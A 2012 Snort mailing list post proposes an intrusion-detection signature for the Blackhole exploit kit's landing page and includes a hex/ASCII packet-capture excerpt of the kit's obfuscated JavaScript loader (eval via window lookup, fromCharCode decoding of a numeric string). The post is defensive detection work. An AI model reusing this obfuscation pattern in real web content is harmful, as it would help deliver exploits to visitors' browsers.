Snort mailing list archives
Proposed Signature - "COMMUNITY SPECIFIC-THREATS Blackhole landing page with specific structure - prototype catch qq"
From: Community Proposed <lists () packetmail net>
Date: Wed, 7 Mar 2012 09:55:15 -0600
Please see the below for a variant of the catch(qq hostile blackhole exploit
kit initial landing. VRT -- PCAP en-route.
Note 'origin community' in metadata; uncertain what the nomenclature for this
will be. Not sure if 'origin vrt' and 'origin community' are what you had in
mind.
alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any \
(msg:"SPECIFIC-THREATS Blackhole landing page with specific structure - prototype catch qq"; \
flow:to_client,established; file_data; content:")try{"; \
content:"prototype}catch(qq"; distance:0; \
metadata:policy balanced-ips drop, policy security-ips drop, service http, origin community; \
reference:url,community.websense.com/blogs/securitylabs/pages/black-hole-exploit-kit.aspx; \
classtype:attempted-user; sid:x; rev:1;)
PCAP ASCII Snippet:
0x0470: 6d65 2e35 2e37 2e30 223e 3c2f 6f62 6a65 me.5.7.0"></obje
0x0480: 6374 3e3c 2f68 746d 6c3e 3c73 6372 6970 ct></html><scrip
0x0490: 743e 6966 2877 696e 646f 772e 646f 6375 t>if(window.docu
0x04a0: 6d65 6e74 2974 7279 7b6e 6577 2261 222e ment)try{new"a".
0x04b0: 7072 6f74 6f74 7970 657d 6361 7463 6828 prototype}catch(
0x04c0: 7171 7129 7b7a 7a3d 2765 7661 6c27 3b73 qqq){zz='eval';s
0x04d0: 733d 5b5d 3b61 613d 5b5d 2b30 3b61 6161 s=[];aa=[]+0;aaa
0x04e0: 3d30 2b5b 5d3b 6966 2861 612e 696e 6465 =0+[];if(aa.inde
0x04f0: 784f 6628 6161 6129 3d3d 3d30 297b 663d xOf(aaa)===0){f=
0x0500: 2766 726f 6d43 6861 7227 3b66 2b3d 2743 'fromChar';f+='C
0x0510: 6f64 6527 3b7d 6565 3d27 6527 3b65 3d77 ode';}ee='e';e=w
0x0520: 696e 646f 775b 7a7a 5d3b 743d 2779 273b indow[zz];t='y';
0x0530: 7d68 3d4d 6174 682e 6174 616e 3228 332c }h=Math.atan2(3,
0x0540: 3029 2f4d 6174 682e 5049 2a2d 343b 6e3d 0)/Math.PI*-4;n=
0x0550: 2233 2e35 7033 2e35 7035 312e 3570 3530 "3.5p3.5p51.5p50
0x0560: 7031 3570 3139 7034 3970 3534 2e35 7034 p15p19p49p54.5p4
0x0570: 382e 3570 3537 2e35 7035 332e 3570 3439 8.5p57.5p53.5p49
0x0580: 2e35 7035 3470 3537 7032 3270 3530 2e35 .5p54p57p22p50.5
0x0590: 7034 392e 3570 3537 7033 332e 3570 3533 p49.5p57p33.5p53
0x05a0: 7034 392e 3570 3533 2e35 7034 392e 3570 p49.5p53.5p49.5p
0x05b0: 3534 7035 3770 3536 2e35 7033 3270 3539 54p57p56.5p32p59
Thanks,
Nathan
